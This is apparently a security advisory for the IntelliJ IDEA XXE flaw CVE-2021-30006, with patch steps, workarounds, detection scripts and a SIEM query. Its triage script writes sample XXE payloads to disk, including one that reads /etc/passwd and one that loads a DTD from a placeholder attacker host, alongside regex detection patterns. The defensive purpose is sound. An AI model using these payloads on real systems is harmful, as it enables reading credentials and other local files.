CVE-2021-30006

7.5 HIGH
XXE

📋 TL;DR

This CVE describes an XML External Entity (XXE) vulnerability in IntelliJ IDEA: a crafted XML file opened or processed in the IDE can declare an external entity that makes the IDE's XML parser read local files and hand their contents to the attacker. It affects users running IntelliJ IDEA versions before 2020.3.3 who process untrusted XML files within the IDE.

💻 Affected Systems

Products:
  • IntelliJ IDEA
Versions: All versions before 2020.3.3
Operating Systems: Windows, macOS, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Vulnerability exists in XML parsing functionality; exploitation requires processing untrusted XML files within the IDE.

📦 What is this software?

IntelliJ IDEA is JetBrains' IDE for Java, Kotlin and other JVM languages. Parsing XML is part of its normal operation (Maven pom.xml files, Spring and Android configuration, run configurations, plugin descriptors), so an XML file inside a project is an ordinary thing for a developer to open, which is what makes an XXE bug in the IDE's parser reachable.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Disclosure of any file the IDE process can read. On a developer workstation that routinely includes SSH keys, cloud and package-registry credentials, API tokens in configuration files, and proprietary source code; those secrets are the stepping stone to source repositories, CI and cloud accounts. The file read itself is not a system compromise, but what it leaks usually is enough to get one.

🟠

Likely Case

Information disclosure of local files accessible to the IDE process, most often project files and configuration data, triggered when the victim opens a malicious XML file in the IDE (for example one shipped inside a cloned repository or a shared project).

🟢

If Mitigated

Limited impact once the IDE is on 2020.3.3 or later. Short of that, refusing to open XML from untrusted sources in the IDE removes the trigger; the IDE's own parser configuration is not something a user can harden from the outside.

🌐 Internet-Facing: LOW - IntelliJ IDEA is typically not directly internet-facing, though plugins or integrations could expose attack surface.
🏢 Internal Only: MEDIUM - Internal users could exploit this if they can get victims to open malicious XML files, but requires user interaction.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Exploitation requires user interaction (opening malicious XML file) and knowledge of the vulnerability.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2020.3.3 and later

Vendor Advisory: https://blog.jetbrains.com/blog/2021/05/07/jetbrains-security-bulletin-q1-2021/

Restart Required: Yes

Instructions:

1. Open IntelliJ IDEA.
2. Go to Help > Check for Updates.
3. Install version 2020.3.3 or later.
4. Restart the IDE when prompted.

🔧 Temporary Workarounds

Disable XML external entity processing

Platform: all

Configure XML parsers to disable external entity expansion (external general and parameter entities, and ideally DOCTYPE declarations altogether). No single command applies: this is done through settings or code changes wherever you control the parser, for example in your own build tooling or plugin code. It does not change the parser inside the IDE itself, which is what the patch addresses.

Avoid processing untrusted XML files

Platform: all

Only open XML files from trusted sources within IntelliJ IDEA. Treat XML that arrives in a freshly cloned or downloaded project as untrusted until it has been inspected for DOCTYPE and ENTITY declarations.

🧯 If You Can't Patch

  • Implement strict input validation for XML files: reject or quarantine any XML carrying a DOCTYPE with external entity declarations or an external DTD reference before it reaches developer workstations
  • Use network segmentation to limit access to sensitive systems from affected workstations, and restrict outbound HTTP/FTP from them, since out-of-band XXE needs an outbound request to carry file contents to the attacker
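
A small triage script for the "validate XML before it is opened" advice, added here as an example and not part of the advisory or of JetBrains' tooling. It flags the declaration shapes XXE relies on (an ENTITY with a SYSTEM or PUBLIC identifier, or a DOCTYPE that loads an external DTD) across every .xml file under a directory. The sample files are constructed inline; the host attacker.invalid is a placeholder, not a real indicator.

```shell
#!/bin/sh
# Added example (not from the advisory): triage XML files for external entity
# use before they are opened in an affected IDE. Sample files below are
# constructed for the demo; attacker.invalid is a placeholder host.

# An ENTITY declaration (general, or parameter with "%") carrying a SYSTEM or
# PUBLIC external identifier: the classic XXE shape.
ENTITY_RE='<!ENTITY[[:space:]]+(%[[:space:]]+)?[^[:space:]>]+[[:space:]]+(SYSTEM|PUBLIC)'
# A DOCTYPE that pulls in an external DTD, where the entities live elsewhere.
DTD_RE='<!DOCTYPE[^[>]*(SYSTEM|PUBLIC)'

# classify_xml FILE: print one of
#   external-entity   entity declared with a SYSTEM/PUBLIC identifier
#   external-dtd      DOCTYPE references an external DTD
#   internal-doctype  DOCTYPE with only an internal subset
#   clean             no DOCTYPE at all
classify_xml() {
  # Flatten line breaks first: a declaration may be split across lines,
  # and grep matches one line at a time.
  body=$(tr '\r\n' '  ' < "$1")
  if printf '%s' "$body" | grep -Eiq "$ENTITY_RE"; then
    echo external-entity
  elif printf '%s' "$body" | grep -Eiq "$DTD_RE"; then
    echo external-dtd
  elif printf '%s' "$body" | grep -iq '<!DOCTYPE'; then
    echo internal-doctype
  else
    echo clean
  fi
}

# scan_xml_tree DIR: print "<verdict> <path>" for every *.xml under DIR.
scan_xml_tree() {
  find "$1" -type f -name '*.xml' | sort | while IFS= read -r f; do
    printf '%s %s\n' "$(classify_xml "$f")" "$f"
  done
}

# suspect_count DIR: number of XML files under DIR that reach outside themselves.
suspect_count() {
  scan_xml_tree "$1" | grep -Ec '^external-(entity|dtd) ' || true
}

# make_demo_tree DIR: write constructed samples (not real project files).
make_demo_tree() {
  mkdir -p "$1"
  printf '<?xml version="1.0"?>\n<project><name>demo</name></project>\n' > "$1/pom.xml"
  cat > "$1/read-passwd.xml" <<'EOF'
<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe
    SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
EOF
  cat > "$1/oob.xml" <<'EOF'
<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % remote SYSTEM "http://attacker.invalid/evil.dtd">
  %remote;
]>
<data/>
EOF
  cat > "$1/external-dtd.xml" <<'EOF'
<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://attacker.invalid/evil.dtd">
<data/>
EOF
  cat > "$1/internal.xml" <<'EOF'
<?xml version="1.0"?>
<!DOCTYPE note [ <!ENTITY author "Ada"> ]>
<note>&author;</note>
EOF
}

demo=$(mktemp -d)
make_demo_tree "$demo"
scan_xml_tree "$demo"
echo "suspect files: $(suspect_count "$demo")"
rm -rf "$demo"
```

Run it against a checkout before opening the project (`scan_xml_tree path/to/checkout`). Anything reported as external-entity or external-dtd should be inspected or dropped; internal-doctype files are not a trigger for this bug but are worth a glance, since an internal subset is where the entity declarations of a file-read payload live.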

🔍 How to Verify

Check if Vulnerable:

Check IntelliJ IDEA version in Help > About. If version is below 2020.3.3, system is vulnerable.

Check Version:

On Linux/macOS: read the "version" field of product-info.json in the install directory (Linux tarball installs: the unpacked IDE directory; JetBrains Toolbox installs: under ~/.local/share/JetBrains/Toolbox/apps/; macOS: grep '"version"' "/Applications/IntelliJ IDEA.app/Contents/Resources/product-info.json"). The build.txt file in the same directory gives the build number; 2020.3.x builds start with 203. Do not rely on the config directory name (for example IntelliJIdea2020.3): it identifies only the release line, not the patch level, so it cannot tell 2020.3.2 from 2020.3.3.

Verify Fix Applied:

Verify version is 2020.3.3 or higher in Help > About dialog.
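
The same check as a script, added here as an example rather than taken from the advisory or from JetBrains: it reads the "version" field from a product-info.json and compares it numerically against 2020.3.3, so that 2020.3.10 or 2021.1 count as fixed and 2020.3 or 2019.3.5 count as affected. It assumes the pretty-printed JSON JetBrains ships (one "version": "..." field on its own line); the demo file is constructed, not a real install.

```shell
#!/bin/sh
# Added example (not from the advisory or from JetBrains): decide whether an
# IntelliJ IDEA install is below the fixed version 2020.3.3 by reading the
# "version" field of its product-info.json. The demo file at the bottom is
# constructed here to stand in for a real install.

FIXED_VERSION=2020.3.3

# version_lt A B: exit 0 if dotted version A is lower than B.
# Missing components count as 0, so 2020.3 < 2020.3.3 and 2021.1 > 2020.3.3.
version_lt() {
  a=$1
  b=$2
  while [ -n "$a" ] || [ -n "$b" ]; do
    ax=${a%%.*}
    bx=${b%%.*}
    if [ "$a" = "$ax" ]; then a=; else a=${a#*.}; fi
    if [ "$b" = "$bx" ]; then b=; else b=${b#*.}; fi
    [ "${ax:-0}" -lt "${bx:-0}" ] && return 0
    [ "${ax:-0}" -gt "${bx:-0}" ] && return 1
  done
  return 1
}

# idea_version FILE: print the numeric version from product-info.json
# (a trailing suffix such as " EAP" is dropped), or nothing if absent.
idea_version() {
  sed -n 's/.*"version"[[:space:]]*:[[:space:]]*"\([0-9][0-9.]*\)[^"]*".*/\1/p' "$1" | head -n 1
}

# idea_vulnerable FILE: exit 0 if the install described by FILE is below
# 2020.3.3 (affected by CVE-2021-30006), 1 if fixed, 2 if undetermined.
idea_vulnerable() {
  v=$(idea_version "$1")
  if [ -z "$v" ]; then
    echo "could not read version from $1" >&2
    return 2
  fi
  if version_lt "$v" "$FIXED_VERSION"; then
    echo "$v: vulnerable (below $FIXED_VERSION)"
    return 0
  fi
  echo "$v: fixed ($FIXED_VERSION or later)"
  return 1
}

# Where the real file normally lives (assumed; adjust to your install):
#   Linux tarball: <install-dir>/product-info.json
#   macOS:         /Applications/IntelliJ IDEA.app/Contents/Resources/product-info.json
# Demo on a constructed file standing in for a 2020.3.2 install:
demo=$(mktemp -d)
cat > "$demo/product-info.json" <<'EOF'
{
  "name": "IntelliJ IDEA",
  "version": "2020.3.2"
}
EOF
idea_vulnerable "$demo/product-info.json"
rm -rf "$demo"
```

Point idea_vulnerable at the real product-info.json of each install on a workstation (Toolbox can keep several side by side) and act on exit status 0; status 2 means the file did not carry a version field and the Help > About dialog is the fallback.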

📡 Detection & Monitoring

Log Indicators:

  • Unusual file access patterns from IntelliJ IDEA process
  • XML parsing errors with external entity references

Network Indicators:

  • Outbound HTTP or FTP connections from the IDE process to hosts that are not known JetBrains, plugin-repository or artifact-repository endpoints; out-of-band XXE uses such a request to carry file contents to the attacker's server

SIEM Query:

(process_name:"idea.exe" OR process_name:"idea64.exe" OR process_name:"idea") AND event_type:"file_access" AND (file_path:"/etc/passwd" OR file_path:"C:\\Windows\\System32\\config\\SAM")

The original query lacked parentheses, so the OR/AND precedence matched far more than intended; the grouped form above restricts it to the IDE process reading the two canary paths. Expect occasional benign hits, and correlate any match with an XML file opened in the IDE shortly before.
